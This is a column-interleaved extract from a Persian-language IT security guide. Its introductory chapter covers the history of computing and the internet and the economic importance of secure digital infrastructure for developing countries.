ﺍﻧﺴﺠﺎﻡ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺳـﻤﺖ ﺟﺎﻣﻌـﺔ ﺍﻗﺘـﺼﺎﺩﻱ ﺟﻬـﺎﻧﻲ ﺍﻓـﺰﺍﻳﺶ
ﺩﻫﻨﺪ؛ ﻭﻟﻲ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺑـﺮﺍﻱ ﻛـﺸﻮﺭﻫﺎ ﻫﺰﻳﻨـﺔ
ﺯﻳـﺎﺩﻱ ﺩﺍﺭﺩ .ﺳــﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﻣــﺴﺘﻘﻴﻢ ﺧـﺎﺭﺟﻲ ﻭ ﺍﻃﻤﻴﻨــﺎﻥ ﻭ
ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ،ﺑﺴﺘﮕﻲ ﺑﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﻣﻦ
ﻭ ﻛﺎﺭﺁﻣﺪ ﻓﻨﺎﻭﺭﻱ ﻭ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﺩﺍﺭﺩ .ﺩﻭﻟﺘﻬﺎ ،ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ
ﺧﺎﻧﮕﻲ ﻫﻤﮕـﻲ ﺩﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺷـﺒﻜﻪﻫـﺎ ﻭ ﺳـﺮﻣﺎﻳﻪﻫـﺎﻱ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻃﻼﻋﺎﺗﻲ ﺁﻧﻬﺎ ﻧﻘﺶ ﺑﺴﺰﺍﻳﻲ ﺩﺍﺭﻧـﺪ .ﺍﻳـﻦ ﻛﺘـﺎﺏ
ﺣﺎﻭﻱ ﻣﺠﻤﻮﻋﻪ ﺍﻱ ﺍﺯ ﺑﻬﺘـﺮﻳﻦ ﺷـﻴﻮﻩ ﻫـﺎﻱ ﺭﺍﻳـﺞ ﻭ ﺍﻟﮕﻮﻫـﺎﻱ
ﺳــﺮﺁﻣﺪﻱ ﺩﺭ ﺯﻣﻴﻨــﺔ ﺍﻣﻨﻴــﺖ ﺍﺳــﺖ ﻛــﻪ ﺑــﻪ ﺧﻮﺍﻧﻨــﺪﮔﺎﻥ ﺩﺭ
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎ -ﺑـﺮ ﺣـﺴﺐ ﺷـﺮﺍﻳﻂ -ﻛﻤـﻚ
24 Workstation
25 Denial of Service
26 Programmed Threats
28 Universal Copyright Convention 27 Auditing Tools
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﺍﻃﻼﻋـﺎﺗﻲ ﺟﻬـﺎﻧﻲ ﺑﻬـﺮﻩ ﺟـﺴﺘﻪ ﻭ
ﺑﻬﺮﻩﻭﺭﻱ ﻭ ﺟﺬﺍﺑﻴﺖ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﻪ ﻣﺮﺍﺗﺐ ﺍﻓـﺰﺍﻳﺶ ﺩﺍﺩﻩ ﺍﺳـﺖ.
ﻫﺮ ﭼﻨﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﺩﻡ ﺗﻔـﺎﻭﺗﻲ ﻣﻴـﺎﻥ ﺷـﺒﻜﺔ ﺟﻬـﺎﻧﻲ ﻭﺏ ﻭ
ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺋﻞ ﻧﻴـﺴﺘﻨﺪ ،ﻭﻟـﻲ ﺩﺭ ﻭﺍﻗـﻊ ﻭﺏ ﺗﻨﻬـﺎ ﻳﻜـﻲ ﺍﺯ ﺍﻳـﻦ
ﺧﺪﻣﺎﺕ) ٧ﻭ ﺍﻟﺒﺘﻪ ﻣﻬﻤﺘﺮﻳﻦ ﺁﻧﻬﺎ( ﺍﺳﺖ ﻛﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﻪ ﭼﻨﻴﻦ ﺍﺑﺰﺍﺭ ﻣﻘﺪﻣﻪ
ﻗﺪﺭﺗﻤﻨﺪﻱ ﺑﺮﺍﻱ ﺍﻃـﻼﻉﺭﺳـﺎﻧﻲ ﻭ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺗﺒـﺪﻳﻞ
ﻛﺮﺩﻩ ﺍﺳﺖ. ﻇﻬﻮﺭ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻳﻜﻲ ﺍﺯ ﺑﺎﺭﺯﺗﺮﻳﻦ ﭘﻴـﺸﺮﻓﺘﻬﺎﻱ ﻓﻨـﺎﻭﺭﻱ
ﺩﺭ ﻧﻴﻢﻗﺮﻥ ﺍﺧﻴﺮ ﺑﻪ ﺷﻤﺎﺭ ﻣﻲﺁﻳﺪ ﻛـﻪ ﺩﺭ ﺯﻧـﺪﮔﻲ ﻛﻨـﻮﻧﻲ ﺑـﺸﺮ
ﻃﻲ ﺩﻩ ﺳﺎﻝ ﺍﺧﻴﺮ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﻳﻚ ﺍﺑـﺰﺍﺭ ﻣﻬـﻢ ﺍﺭﺗﺒـﺎﻃﻲ ﻣﻴـﺎﻥ
ﺑﺼﻮﺭﺕ ﻋﺎﻣﻠﻲ ﺣﻴﺎﺗﻲ ﺩﺭﺁﻣﺪﻩ ﺍﺳﺖ ١.ﺑﺮﺍﻱ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺎ ﺍﻳـﻦ
ﺗﻤﺎﻣﻲ ﺍﻗﺸﺎﺭ ﺟﺎﻣﻌﻪ ﺗﺒﺪﻳﻞ ﺷﺪﻩ ﻭ ﻣﺎ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳـﻲ ﺁﻧـﻲ ﺑـﻪ
ﻧﻮﻉ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﻗﺎﻟﺐ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺗﺠﻠـﻲ ﻛـﺮﺩﻩ ﻭ ﺑـﻪ
ﺍﻃﻼﻋﺎﺕ ،ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺍﺧﺘـﺼﺎﺻﻲ ،ﺗﻤـﺎﻣﻲ ﺍﻧـﻮﺍﻉ ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ
ﺍﺑﺰﺍﺭﻱ ﻻﺯﻡ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎ ﻭ ﺭﻓﻊ ﻧﻴﺎﺯﻫﺎﻱ ﺷﺨﺼﻲ ﺗﺒـﺪﻳﻞ
ﻛﺎﺭﺑﺮﺩﻱ ،ﺗﺠﺎﺭﻱ ،ﺭﻭﺍﺑﻂ ﻛﺎﺭﻱ ﻭ ﻧﻘﻞ ﻭ ﺍﻧﺘﻘﺎﻻﺕ ﻣﺎﻟﻲ ﺑـﻪ ﺁﻥ
ﺷﺪﻩ ﺍﺳـﺖ .ﺩﺭ ﺳـﺎﻝ ۱۹۵۱ﻣـﻴﻼﺩﻱ ﺯﻣﺎﻧﻴﻜـﻪ ﺍﻭﻟـﻴﻦ ﺭﺍﻳﺎﻧـﺔ
ﻭﺍﺑﺴﺘﻪ ﺍﻳﻢ .ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺩﺳﺘﺮﺳﻲ ﺁﺳﺎﻥ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ
ﺩﻳﺠﻴﺘﺎﻝ ﺗﺠﺎﺭﻱ ﻣﻮﺳﻮﻡ ﺑﻪ UNIVAC Iﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﺁﻣـﺎﺭ ﻭ
ﻣﻮﻓﻘﻴﺖ ﭘﺎﻳﺪﺍﺭ ﻭ ﻣﺪﺍﻭﻡ ﻛـﺸﻮﺭﻫﺎﻱ ﺗﻮﺳـﻌﻪﻳﺎﻓﺘـﻪ ﻳـﻚ ﻋﺎﻣـﻞ
ﺳﺮﺷﻤﺎﺭﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺁﻣﺮﻳﻜﺎ ٢ﺗﺤﻮﻳﻞ ﺩﺍﺩﻩ ﺷﺪ ،ﺑﺴﻴﺎﺭﻱ ﺍﺯ
ﺣﻴﺎﺗﻲ ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﺩ ﻭ ﺍﻫﻤﻴﺖ ﺁﻥ ﺑـﺮﺍﻱ ﻛـﺸﻮﺭﻫـﺎﻱ ﺩﺭﺣـﺎﻝ
ﻣﺮﺩﻡ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﭼﻴﺰﻱ ﻧﻤﻲﺩﺍﻧﺴﺘﻨﺪ ﻭ ﺁﻥ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻧﻴـﺰ
ﺗﻮﺳﻌﻪ ﻧﻴﺰ ﺑﺴﺮﻋﺖ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ .ﺁﺛﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ
ﺗﻨﻬﺎ ﺩﺭ ﺗﻌﺪﺍﺩ ﺍﻧﮕﺸﺖ ﺷﻤﺎﺭﻱ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﻭ ﺁﺯﻣﺎﻳـﺸﮕﺎﻫﻬﺎﻱ
ﻭ ﻧﺘﺎﻳﺞ ﺣﺎﺻﻠﻪ ﺍﺯ ﺍﻧﻘﻼﺏ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻣﺮﺯ ﻓﻮﺍﻳـﺪ ﻣـﺴﺘﻘﻴﻢ ﺁﻧﻬـﺎ
ﺗﺤﻘﻴﻘﺎﺗﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻨﺪ .ﺍﻳﻦ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺰﺭﮒ ،ﮔﺮﺍﻥ
ﻓﺮﺍﺗﺮ ﺭﻓﺘﻪ ﻭ ﭘﻴﺶﺑﻴﻨﻲ ﻣﻲﺷﻮﺩ ﻛﻪ ﺗﺄﺛﻴﺮﺍﺕ ﺑﻴﺸﺘﺮﻱ ﻧﻴﺰ ﺩﺭ ﺭﺍﻩ
ﻭ ﻣﻤﻠﻮ ﺍﺯ ﺍﺷﻜﺎﻝ ﺑﻮﺩﻧﺪ .ﺩﺭ ﻣﻘﺎﺑﻞ ،ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺍﻣﺮﻭﺯﻱ ﺍﻧﺪﺍﺯﻩﺍﻱ
ﺑﺎﺷﻨﺪ.
ﻧﺴﺒﺘﹰﺎ ﻛﻮﭼﻚ ﺩﺍﺭﻧﺪ ،ﺍﺭﺯﺍﻥ ﻭ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥ ﻫﺴﺘﻨﺪ ﻭ ﻣـﻲﺗـﻮﺍﻥ
ﺍﻭﻝ ﺍﺯ ﻫﻤﻪ ﺍﻳﻨﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺮﺯﻫﺎﻱ ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﻣﻴـﺎﻥ ﻛـﺎﺭﺑﺮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻫﺮ ﻛﺸﻮﺭﻱ ﻳﺎﻓﺖ.
ﻣﺘﺼﻞ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﻛﻤﺮﻧﮓ ﻛﺮﺩﻩ ﻭ ﺭﻭﻧﺪ ﺟﻬﺎﻧﻲﺳﺎﺯﻱ ﺭﺍ ﺑﺎ ﺍﺭﺍﺋـﻪ
ﺑــﻪ ﻓﺎﺻــﻠﺔ ﻛﻮﺗــﺎﻫﻲ ﭘــﺲ ﺍﺯ ﺭﻭﺍﺝ ﺭﺍﻳﺎﻧــﻪﻫــﺎ ﺩﺭ ﺩﺍﻧــﺸﮕﺎﻫﻬﺎ،
ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺗﺴﻬﻴﻞ ﻧﻤﻮﺩﻩ ﻭ ﻟـﺬﺍ ﻫـﺮ ﻛـﺴﻲ
ﭘﺮﻭﮊﻩﻫﺎﻱ ﺗﺤﻘﻴﻘﺎﺗﻲ ﺑﺮﺍﻱ ﻣﺮﺗﺒﻂ ﺳﺎﺧﺘﻦ ﺁﻧﻬﺎ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺑـﻪ
ﻣﺴﺘﻘﻞ ﺍﺯ ﻣﺤﻞ ﻓﻴﺰﻳﻜﻲ ﺧﻮﺩ ﻗﺎﺩﺭ ﺑﻪ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ ﺁﻥ
ﻧﺤﻮﻱ ﻛﻪ ﺍﻣﻜﺎﻥ ﻣﺒﺎﺩﻟﺔ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﺑﻮﺟـﻮﺩ ﺁﻳـﺪ ﺁﻏـﺎﺯ
ﻣﻲﺑﺎﺷﺪ .ﻣﻮﺗﻮﺭﻫـﺎﻱ ﺟـﺴﺘﺠﻮ ٨ﺑـﺮ ﺭﻭﻧـﺪ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮ ﺗـﺄﺛﻴﺮﻱ
ﺷــﺪﻧﺪ .ﺍﺯ ﻣﻴــﺎﻥ ﺍﻳــﻦ ﭘــﺮﻭﮊﻩﻫــﺎ ،ﭘــﺮﻭﮊﺓ ﺗﻮﺳــﻌﺔ ﺷــﺒﻜﺔ
ﻣﻀﺎﻋﻒ ﺩﺍﺷﺘﻪﺍﻧﺪ؛ ﭼﺮﺍﻛﻪ ﻧﺘﺎﻳﺞ ﺟﺴﺘﺠﻮ ﺑﺮ ﺍﺳﺎﺱ ﻣﻮﺿـﻮﻋﺎﺕ
ARPANETﻣﻮﻓﻘﻴﺖ ﺑﻴﺸﺘﺮﻱ ﻛﺴﺐ ﻛﺮﺩ ﻭ ﺑـﻪ ﺁﻥ ﭼﻴـﺰﻱ
ﻇﺎﻫﺮ ﻣﻲﺷﻮﻧﺪ ﻭ ﻧﻪ ﺑﺮ ﺍﺳﺎﺱ ﻓﺎﺻﻠﻪﺍﻱ ﻛﻪ ﻛﺎﺭﺑﺮ ﺑﺎ ﺁﻧﻬـﺎ ﺩﺍﺭﺩ؛
ﺗﺒﺪﻳﻞ ﺷﺪ ﻛﻪ ﺍﻣﺮﻭﺯ ﺁﻧﺮﺍ ﺑﻌﻨﻮﺍﻥ "ﺍﻳﻨﺘﺮﻧﺖ" ﻣﻲﺷﻨﺎﺳﻴﻢ ﻭ ﺩﺭﺣﺎﻝ
ﺏ ﻛﺎﺭﺧﺎﻧﺠــﺎﺕ ﻭ ﺷــﺮﻛﺘﻬﺎﻱ ﻭﺍﻗــﻊ ﺩﺭ ﺑﻄﻮﺭﻳﻜــﻪ ﭘﺎﻳﮕــﺎﻩ ﻭ ﹺ
ﺣﺎﺿﺮ ﺑﻴﺶ ﺍﺯ ۳۰۰ﻣﻴﻠﻴﻮﻥ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺑـﻪ ﻫـﻢ
ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻭ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ﺍﺯ ﻣﻮﻗﻌﻴـﺖ ﻳﻜـﺴﺎﻧﻲ
ﻣﺮﺗﺒﻂ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﺑﺮﺍﻱ ﻧﻈﺎﺭﻩﺷﺪﻥ ﺗﻮﺳﻂ ﻣﺮﺍﺟﻌﻴﻦ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻨﺪ.
٥
ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﻭﺏ ٣ﻛﻪ ﺗﻮﺳﻂ ﺗﻴﻢ ﺑﺮﻧﺮﺯ ﻟﻲ ٤ﻭ ﺭﺍﺑـﺮﺕ ﻛـﺎﻳﻠﻴﻮ
ﺩﻭﻣﻴﻦ ﻣﺴﺌﻠﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺗﺄﺛﻴﺮﻱ ﺷﮕﺮﻑ ﺩﺭ ﻓﺮﺁﻳﻨـﺪ
ﺩﺭ ﻣﺮﻛﺰ ﺗﺤﻘﻴﻘﺎﺕ ﻫﺴﺘﻪﺍﻱ ﺍﺭﻭﭘﺎ ٦ﺩﺭ ﺍﻭﺍﻳﻞ ﺩﻫﺔ ۹۰ﻣﻴﻼﺩﻱ ﻭ
ﺣﺬﻑ ﻭﺍﺳﻄﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺩﺍﺷﺘﻪ ﺍﺳﺖ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣـﻲﺗـﻮﺍﻥ
ﺩﺭ ﺷﻬﺮ ﮊﻧﻮ ﺍﻳﺠﺎﺩ ﺷﺪ ﺳﺮﻭﻳﺲ ﻗﺪﺭﺗﻤﻨﺪﻱ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ
ﺑــﻪ ﻛــﺎﻫﺶ ﭼــﺸﻤﮕﻴﺮ ﻧــﺮﺥ ﺍﺳــﺘﺨﺪﺍﻡ ﻣﻨــﺸﻲ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ
ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺍﺷﺎﺭﻩﻛﺮﺩ ﻛﻪ ﺩﻟﻴﻞ ﺁﻥ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﻮﺷﺘﻦ ﻣﺘﻦ ﻭ
1 Digital Tornado: The Internet and
ﭼﺎﭖ ﻭ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺷﺨﺼﻲ ﺑﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﺍﺯ ﻃﺮﻳـﻖ ﺗـﺴﻬﻴﻼﺗﻲ Telecommunications Policy FCC Staff
Working Paper on Internet Policy (1997):
ﭼﻮﻥ ﭘﺮﺩﺍﺯﺷﮕﺮ ﻛﻠﻤﺎﺕ ﻭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺁﺳـﺎﻧﺘﺮ ﺍﺯ ﺩﻳﻜﺘـﻪ http://www.fcc.gov/Bureaus/Miscellaneous/Ne
ﻛــﺮﺩﻥ ﻣــﺘﻦ ﺑــﺮﺍﻱ ﻳــﻚ ﻣﻨــﺸﻲ ﺍﺳــﺖ .ﺑــﻪ ﻫﻤــﻴﻦ ﺗﺮﺗﻴــﺐ ws_Releases/1997/nrmc7020.html
2 U.S. Bureau of Census
3 World-Wide Web
4 Tim Berners-Lee
5 Robert Cailliau
7 Services 6 Center for European Nuclear Research
8 Search Engine )(CERN
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٨
ﺭﻭﺍﺑﻂ ﻛﺎﺭﻱ ﺑﺮ ﺍﺳﺎﺱ ﮔﻔﺘﮕﻮﻫـﺎﻱ ﺭﻭ ﺩﺭ ﺭﻭ ﺍﻧﺠـﺎﻡ ﻣـﻲﮔﻴـﺮﺩ ﻱ ﺩﺳﺘﻪﺟﻤﻌﻲ ﻧﻴﺰ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺭﻭ ﺑﻪ ﺍﻧﻘﺮﺍﺽ ﺍﺳﺖ، ﮔﺮﺩﺷﮕﺮ ﹺ
ﻛﻤﺎﺑﻴﺶ ﺍﺯ ﺍﻫﻤﻴﺖ ﻳﻜﺴﺎﻧﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ. ﭼﺮﺍﻛﻪ ﮔﺮﺩﺷـﮕﺮﺍﻥ ﻣـﻲ ﺗﻮﺍﻧﻨـﺪ ﺑﻠﻴﻄﻬـﺎﻱ ﻫـﻮﺍﻳﻲ ﻳـﺎ ﻗﻄـﺎﺭ ﻭ
ﻫﻤﭽﻨﻴﻦ ﺍﺗﺎﻗﻬﺎﻱ ﻫﺘﻞ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﺑـﺮﺧﻂ ٩ﺭﺯﺭﻭ
ﺍﻳﻦ ﻣﻄﻠﺐ ﺩﺭ ﻣﻮﺭﺩ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻧﻴﺰ ﻭﺍﺿﺢ ﺍﺳـﺖ:
ﻛﻨﻨﺪ ﻭ ﺍﻳﻦ ﺍﻣﺮ ﻣﻮﺟﺐ ﺻﺮﻓﻪﺟﻮﻳﻲ ﺩﺭ ﻫﺰﻳﻨﻪ ﻭ ﻭﻗﺖ ﻣـﺸﺘﺮﻱ
ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﺳـﻄﺢ ﺍﻣﻨﻴﺘـﻲ ﻣﻨﺎﺳـﺒﻲ ﺩﺭ ﺯﻳـﺮﺳـﺎﺧﺘﻬﺎﻱ
ﺷﺪﻩ ﻭ ﺑﺎﻋﺚ ﺷﺪﻩ ﺑﺘﻮﺍﻥ ﺑﺎ ﻛﻤﻲ ﺩﻗﺖ ﺭﻭﻱ ﺳﻔﺎﺭﺷﺎﺕ ،ﺍﺯ ﻳـﻚ
ﺩﻳﺠﻴﺘﺎﻟﻲ ﺧﻮﺩ ﺩﺳﺖ ﻧﻴﺎﻓﺘﻪ ﻭ ﺍﺯ ﺍﺭﺳﺎﻝ ﺍﻃﻼﻋـﺎﺕ ﺧـﻮﻳﺶ ﺑـﻪ
ﺳﻔﺮ ﻣﻔﺮﺡ ﻟـﺬﺕ ﺑـﺮﺩ .ﭘﻴـﺪﺍﻳﺶ ﺷـﺮﻛﺘﻬﺎﻱ ﻓﺮﻭﺷـﻨﺪﺓ ﻛﺘـﺎﺏ،
ﻧﺤﻮ ﻣﻄﻠﻮﺑﻲ ﻣﺤﺎﻓﻈﺖ ﻧﻤﻲﻛﻨﻨﺪ ﺷﺎﻳﺴﺘﺔ ﺍﻋﺘﻤﺎﺩ ﻧﺨﻮﺍﻫﻨﺪ ﺑـﻮﺩ
١٠ ﻣﻮﺳﻴﻘﻲ ﻭ ﻣﺤـﺼﻮﻻﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺼﻮﺭﺕ ﺑـﺮﺧﻂ ﻣﻮﺟـﺐ
ﻭ ﺍﺯ ﻛﺎﺭﻭﺍﻥ ﺍﻗﺘﺼﺎﺩ ﻧﻮﻳﻦ ﺟﻬﺎﻧﻲ ﻋﻘﺐ ﺧﻮﺍﻫﻨﺪ ﻣﺎﻧﺪ.
ﺗﻬﺪﻳــﺪ ﻭ ﺿــﺮﺑﻪ ﺑــﻪ ﻓﺮﻭﺷــﮕﺎﻫﻬﺎﻱ ﻋﺮﺿــﻪﻛﻨﻨــﺪﺓ ﺍﻳﻨﮕﻮﻧــﻪ
ﺍﻧﻘﻼﺏ ﺩﻳﺠﻴﺘﺎﻝ ﻣﺤﺼﻮﻻﺕ ﺷﺪﻩ ،ﺍﻣﺎ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺨﺸﻬﺎﻱ ﺍﻳﻦ
ﺻﻨﻒ ﺑﻪ ﮔﺴﺘﺮﺩﻩﺗﺮ ﺷﺪﻥ ﻃﻴﻒ ﺑﺎﺯﺍﺭ ﻫﺪﻑ ﻧﻴﺰ ﺍﻧﺠﺎﻣﻴﺪﻩ ﺍﺳﺖ.
ﺍﻣﺮﻭﺯﻩ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﺍﺯ ﺣﻴﻄﺔ ﺭﺍﻳﺎﻧﻪﻫـﺎ ﻓﺮﺍﺗـﺮ ﺭﻓﺘـﻪ ﺍﺳـﺖ. ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺣﺮﻓـﻪﻫـﺎ ﻭ ﺻـﻨﺎﻳﻊ ﺳـﻨﺘﻲ ﺑـﻪ ﻭﺟـﻮﺩ ﺧـﻮﺩ ﺍﺩﺍﻣـﻪ
ﭘﻴﺸﺮﻓﺘﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺻﻨﻌﺖ ﻣﻴﻜﺮﻭﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﺍﻣﻜﺎﻥ ﺳﺎﺧﺖ ﻣﻲﺩﻫﻨﺪ ،ﺗﻤﺎﻳﻞ ﺩﺍﺭﻧﺪ ﺍﻓﺮﺍﺩ ﻛﻤﺘـﺮﻱ ﺑـﻪ ﺍﺳـﺘﺨﺪﺍﻡ ﺩﺭﺁﻭﺭﻧـﺪ ﻭ
ﺍﺑﺰﺍﺭﻫﺎﻱ ﭘﻴﭽﻴﺪﺓ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻣﻘﻴﺎﺳﻬﺎﻱ ﺑـﺴﻴﺎﺭ ﻛﻮﭼـﻚ ﺭﺍ ﺣﺘﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺠـﺎﻱ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ ﻋﻤـﻮﻣﻲ ﺑـﻪ ﺳـﻤﺖ
ﻓﺮﺍﻫﻢ ﺁﻭﺭﺩﻩ ﺑﻄﻮﺭﻳﻜﻪ ﺍﻛﻨﻮﻥ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﺠﻬﻴﺰﺍﺕ ﺍﺭﺗﺒﺎﻃﻲ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺗﺨﺼﺼﻲ ﺣﺮﻛﺖ ﻛﻨﻨﺪ .ﺗﺄﺛﻴﺮﺍﺕ ﻣﺸﻬﻮﺩ ﺭﻭﻧـﺪ ﺣـﺬﻑ
ﻭ ﻣﺤﺎﺳﺒﺎﺗﻲ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩ ﺭﺍ ﺩﺭ ﺟﻴﺐ ﺧﻮﺩ ﺟﺎﻱ ﺩﻫﻴﺪ .ﻋـﻼﻭﻩ ﻭﺍﺳﻄﻪﻫﺎ ﻛﻪ ﺑﺎ ﻇﻬﻮﺭ ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﺷـﺮﻭﻉ ﺷـﺪ ﺑـﺮﺍﻱ ﻣـﺪﺗﻲ
ﺑﺮ ﺍﻳﻦ ﺑﻬﺒﻮﺩ ﻧﺴﺒﺖ ﻗﻴﻤﺖ ﺑﻪ ﻛﺎﺭﺁﻳﻲ ﺑﺮﺍﻱ ﺍﻳﻦ ﻧﻮﻉ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﻃﻮﻻﻧﻲ ﺍﺩﺍﻣﻪ ﺧﻮﺍﻫﺪ ﻳﺎﻓـﺖ ﻭ ﺑـﺎ ﺍﻫﻤﻴـﺖ ﺭﻭﺯﺍﻓـﺰﻭﻥ ﻓﻨـﺎﻭﺭﻱ
ﻫﺮ ﺳﺎﻝ ﭼﻴـﺰﻱ ﺣـﺪﻭﺩ %۳۰ﺍﺳـﺖ ﻭ ﺍﺣﺘﻤـﺎﻝ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﻳـﻦ ﺍﻃﻼﻋﺎﺕ ،ﺻﻨﺎﻳﻊ ﻭ ﺣﺮﻓﻪﻫﺎﻱ ﺑﻴﺸﺘﺮﻱ ﺑﺎ ﺁﻥ ﺟﺎﻳﮕﺰﻳﻦ ﺧﻮﺍﻫﻨﺪ
ﻧﺴﺒﺖ ﺗﺎ ﺩﻩ ﺳﺎﻝ ﺁﻳﻨﺪﻩ ﻧﻴﺰ ﺑﺴﻴﺎﺭ ﺑﺎﻻﺳـﺖ ١١.ﺍﻧﺘﻈـﺎﺭ ﻣـﺎ ﺍﻳـﻦ ﺷﺪ.
